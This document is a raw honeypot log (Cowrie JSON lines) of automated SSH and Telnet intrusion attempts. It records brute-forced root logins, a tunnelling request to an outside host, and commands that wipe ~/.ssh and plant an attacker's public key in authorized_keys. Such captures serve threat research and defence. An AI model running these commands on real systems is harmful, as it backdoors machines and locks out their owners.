{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":34360,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e5166e2e05","protocol":"ssh","message":"New connection: 92.118.39.62:34360 (1.2.3.4:22) [session: 07e5166e2e05]","sensor":"my-vps","timestamp":"2025-09-09T05:23:25.186053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:23:25.187035Z","src_ip":"92.118.39.62","session":"07e5166e2e05"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:23:25.216721Z","src_ip":"92.118.39.62","session":"07e5166e2e05"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:23:25.308273Z","src_ip":"92.118.39.62","session":"07e5166e2e05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21961,"dst_ip":"1.2.3.4","dst_port":22,"session":"f392dcffc8ea","protocol":"ssh","message":"New connection: 212.227.235.229:21961 (1.2.3.4:22) [session: f392dcffc8ea]","sensor":"my-vps","timestamp":"2025-09-09T05:23:25.900928Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:23:25.901968Z","src_ip":"212.227.235.229","session":"f392dcffc8ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22279,"dst_ip":"1.2.3.4","dst_port":22,"session":"244c4b569f01","protocol":"ssh","message":"New connection: 212.227.235.229:22279 (1.2.3.4:22) [session: 244c4b569f01]","sensor":"my-vps","timestamp":"2025-09-09T05:23:26.027289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:23:26.028923Z","src_ip":"212.227.235.229","session":"244c4b569f01"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T05:23:26.156735Z","src_ip":"212.227.235.229","session":"244c4b569f01"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:23:26.339463Z","src_ip":"92.118.39.62","session":"07e5166e2e05"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:23:26.541616Z","src_ip":"212.227.235.229","session":"244c4b569f01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T05:23:26.670467Z","session":"244c4b569f01"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:24:36.027640Z","src_ip":"212.227.235.229","session":"244c4b569f01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45500,"dst_ip":"1.2.3.4","dst_port":23,"session":"91655c397703","protocol":"telnet","message":"New connection: 212.227.235.229:45500 (1.2.3.4:23) [session: 91655c397703]","sensor":"my-vps","timestamp":"2025-09-09T05:25:12.791243Z"}
{"eventid":"cowrie.session.closed","duration":12.556605815887451,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:25.347783Z","src_ip":"212.227.235.229","session":"91655c397703"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45819,"dst_ip":"1.2.3.4","dst_port":23,"session":"c58cf627f84e","protocol":"telnet","message":"New connection: 212.227.235.229:45819 (1.2.3.4:23) [session: c58cf627f84e]","sensor":"my-vps","timestamp":"2025-09-09T05:25:25.583179Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":49444,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f1fec86d0e","protocol":"ssh","message":"New connection: 213.6.203.226:49444 (1.2.3.4:22) [session: 26f1fec86d0e]","sensor":"my-vps","timestamp":"2025-09-09T05:25:29.818226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:25:29.819175Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:25:29.888090Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.login.success","username":"root","password":"admini","message":"login attempt [root/admini] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.205523Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:25:30.363528Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.364436Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.365469Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.435606Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:25:30.670701Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.671502Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.742264Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.743372Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":57678,"dst_ip":"1.2.3.4","dst_port":22,"session":"b946678ecb18","protocol":"ssh","message":"New connection: 213.6.203.226:57678 (1.2.3.4:22) [session: b946678ecb18]","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.803583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.804646Z","src_ip":"213.6.203.226","session":"b946678ecb18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:25:30.868926Z","src_ip":"213.6.203.226","session":"b946678ecb18"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:25:31.175419Z","src_ip":"213.6.203.226","session":"b946678ecb18"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:32.242425Z","src_ip":"213.6.203.226","session":"b946678ecb18"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":63810,"dst_ip":"1.2.3.4","dst_port":22,"session":"79bde2ce38ee","protocol":"ssh","message":"New connection: 213.6.203.226:63810 (1.2.3.4:22) [session: 79bde2ce38ee]","sensor":"my-vps","timestamp":"2025-09-09T05:25:32.307052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:25:32.308307Z","src_ip":"213.6.203.226","session":"79bde2ce38ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:25:32.373166Z","src_ip":"213.6.203.226","session":"79bde2ce38ee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:25:32.673825Z","src_ip":"213.6.203.226","session":"79bde2ce38ee"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:32.741808Z","src_ip":"213.6.203.226","session":"79bde2ce38ee"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:32.742760Z","src_ip":"213.6.203.226","session":"26f1fec86d0e"}
{"eventid":"cowrie.session.closed","duration":12.713422060012817,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:38.296506Z","src_ip":"212.227.235.229","session":"c58cf627f84e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46127,"dst_ip":"1.2.3.4","dst_port":23,"session":"36ca838d4d25","protocol":"telnet","message":"New connection: 212.227.235.229:46127 (1.2.3.4:23) [session: 36ca838d4d25]","sensor":"my-vps","timestamp":"2025-09-09T05:25:38.534302Z"}
{"eventid":"cowrie.session.closed","duration":12.781121253967285,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:25:51.315345Z","src_ip":"212.227.235.229","session":"36ca838d4d25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46444,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a50b4962492","protocol":"telnet","message":"New connection: 212.227.235.229:46444 (1.2.3.4:23) [session: 7a50b4962492]","sensor":"my-vps","timestamp":"2025-09-09T05:25:51.555883Z"}
{"eventid":"cowrie.session.closed","duration":12.722515344619751,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:04.278302Z","src_ip":"212.227.235.229","session":"7a50b4962492"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46748,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8d35d4ed648","protocol":"telnet","message":"New connection: 212.227.235.229:46748 (1.2.3.4:23) [session: e8d35d4ed648]","sensor":"my-vps","timestamp":"2025-09-09T05:26:04.533183Z"}
{"eventid":"cowrie.session.closed","duration":12.732187032699585,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:17.265298Z","src_ip":"212.227.235.229","session":"e8d35d4ed648"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47051,"dst_ip":"1.2.3.4","dst_port":23,"session":"d697b2c08e54","protocol":"telnet","message":"New connection: 212.227.235.229:47051 (1.2.3.4:23) [session: d697b2c08e54]","sensor":"my-vps","timestamp":"2025-09-09T05:26:17.496038Z"}
{"eventid":"cowrie.session.closed","duration":12.813630104064941,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:30.309583Z","src_ip":"212.227.235.229","session":"d697b2c08e54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47366,"dst_ip":"1.2.3.4","dst_port":23,"session":"8363ce72920e","protocol":"telnet","message":"New connection: 212.227.235.229:47366 (1.2.3.4:23) [session: 8363ce72920e]","sensor":"my-vps","timestamp":"2025-09-09T05:26:30.562226Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":37190,"dst_ip":"1.2.3.4","dst_port":22,"session":"9459d798bff7","protocol":"ssh","message":"New connection: 213.6.203.226:37190 (1.2.3.4:22) [session: 9459d798bff7]","sensor":"my-vps","timestamp":"2025-09-09T05:26:39.313924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:26:39.314826Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:26:39.384418Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd777","message":"login attempt [root/abcd777] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:26:39.705364Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:26:39.906888Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:26:39.907580Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:26:39.908881Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:39.979875Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:26:40.146678Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:26:40.147513Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
